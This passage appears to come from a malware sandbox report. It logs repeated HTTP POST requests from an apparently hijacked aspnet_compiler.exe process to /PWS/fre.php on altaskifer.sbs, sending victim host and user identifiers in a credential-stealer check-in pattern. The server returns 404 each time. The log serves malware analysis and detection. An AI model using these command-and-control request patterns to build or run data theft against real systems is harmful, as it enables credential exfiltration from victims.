                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbwoXtrwjnbLLJh2mjQBP3L8Q%2FQ9pjSWpMWyDobn%2B6qrh94YlzTJBUvJuDzv%2FBu5n0SlZu6MtQm4jHQlkpMY4WUI7K3%2FFLTJV5lO%2Fko%2BHberpdORawHw4Kml3Xjpz2codg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001169ee4209ae-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.649742172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:39.580791950 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:39.705121040 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:40.073115110 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:40 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDoZIGymzIO5AiUbLpndDKq51%2B%2BU1SHXZHfvIcgKLLtOHE%2BfBNBZLtEbGRHTrrX9Bxs%2B3E8%2FMWTejOaeQIGEUpn2Kl6Vp0ug4o4orN1Z%2FRQTriavg6wbcA8rXNAZvAP%2BXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700116ecddc571e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.649743172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:40.344957113 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:40.469245911 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:40.841494083 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:40 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axEIlhmqw5LyDyYO4mpyOKLAP4kkPBuPq0PWlxSgX0Y71PS1LzKT2jSVbWRxkOzDVStzjzYt8XSqka7N0Zz8w18cT6PjX9FfxWeUj9DYIM4%2BQ4lCBC0gLayfrmoHtPdozQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011738d7721e7-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.649744172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:41.115113974 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:41.239449978 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:41.628089905 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLEeF4dvhsLMBGj7TPGkdWq0TkKrERdjiBM24LeQbyNWp8aMbcjqbrxgHU%2Fk1qXT76FOOpiBhn%2BMetIEsghpHcoJGwuXFhrLvYjRzTpAvtdVqL1w1SNp9OXSkLfOiyuPJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011785ba28dc7-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.649745172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:41.891259909 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:42.015759945 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:42.410334110 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:42 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9q%2FDE0bzkgkeri83BEpg28cjFqZIHWRB7yTUaZJhY8J%2F3mnOlupBFuWRZmvf4oG0DWiUaP2f9BPrbdd59Fx4kBAsEZI%2BT66Er%2BeJnojVOFrKNgsPuKlj%2FEauWgcxJerCNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700117d3d8e7428-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.649746172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:42.690473080 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:42.815066099 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:43.188643932 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:43 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHtzMw8gqyd8ww1EK1BgwMNXzUJTGHFVAIS4yI4QX9upxi0Vv4op3VN1t207upcjUS3yzm5zUWQ00rJ%2BcdKmRpWy6QG1e3lpBoy5%2BnkGGt0VRKU4gJYiwt%2FtVOJC6ALoIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011823de431dd-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.649747172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:43.454363108 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:43.582252026 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:43.960227013 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:43 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvX843q7lulzsHsL78ZIETT0odUBFAq%2BajQIO5XuLZNpzUBkQy4gN4dfiNIwb0K8eKo0NhP3hrAFwy0tjE0suoqQtJrDJ9g8ww3Y%2BuNQgbPLTl%2BT%2FONafuml5w%2FQ9IM3vQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001186fc179ad2-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.649748172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:44.242162943 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:44.366413116 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:44.750694990 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:44 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckbKu7yUVBSLi3epH5Ta25Kkmzmm6thGYGLYC6qL1H5gdY7OYA61onKL5dTE1%2B8ERio%2FO19RSmj95WnvMcUZ3TwAO9ql0L0ErwMu0jCZLqH3%2B6ujcNOZNukUlNZczV5L2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700118beb403364-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.649749172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:45.018069983 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:45.141906023 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:45.522923946 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:45 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdA0pcdPBW59ITYBSbOrJwETnAqWQPCO8%2FIn2wKamMM%2BZzbydoO1Cmw4WOHKQ2FvA8tqhuOyrDhez8xDMjI0zCvlGTzIMBR3ONyXzCPwexJj12Wm%2F2qnmXJ7tw2RGK9fCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001190cdeb3352-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.649750172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:45.799676895 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:45.923952103 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:46.308871984 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZfQRUrB2SdT1eLJyZbio7KvUrEiavKy6urIyN8%2B5G3P7sde62aoet1UR%2BYMfBvosLW0RYLoyF1G78C%2F2InL2kYsYst4Kfxd%2FEI%2FUTIjSRbE4P9zSRqZ4NE9pp34fpTqNDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001195aecda512-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.649751172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:46.581120968 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:46.705096006 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:47.078301907 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WoTy8CytH6FCGJ02FnvnJQaOiLpecp8e28%2ByX1uRiZ4CSBTOCeaW6ZaVGSgaHxFmcxS7lBIQM8gyYJwoov7ksoTD86qCD9xFptaRmKV2l7GNItYd6wSvF1VnZUyXdf2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700119a8a67259a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.649752172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:47.378472090 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:47.505563021 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:47.888562918 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0XodsU6cTpRgul%2BX7ABl17NCZf%2B2hOOH6toQ7msxzgWFuWswfOGEMqSD53AbJakF%2F3rJYxejlf2BPbI8geSPJZX4lnqL05P%2FcNIFJ%2FjADLCVtqXiNeMJggRv6YzGwfRiHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700119f8cfe21b5-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.649753172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:48.178973913 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:48.303620100 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:49.611900091 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:49 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU6XjyB3%2FNRhFBAew165kUx%2B1dACg6uaxbUHhHekBPp4GbNiULy0hq7LyatbVe3K7%2BD5opbbHmzIhAHb7fOgRDlWs%2FaqjJ7G6hNRVmNvpxZ04odVQ7zWC%2BEiFwBW5gPUgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011a4882c5f20-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.649755172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:51.123132944 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:51.248116970 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:51.644701004 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:51 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q63pSfh%2BvejxmCMXLjq0feEjlXe1RY11XvfTfG4xIeMQNPbKAYgakjNORoVfP2RRr2OI6%2FEl4y%2FhgKpIawLCwTRd44XySgK%2BVSCkS1BC8ske%2B%2Bu5I8qFai4yiCazp3UWyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011b6ecd5a56c-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.649756172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:51.920859098 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:52.047920942 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:52.426291943 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:52 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
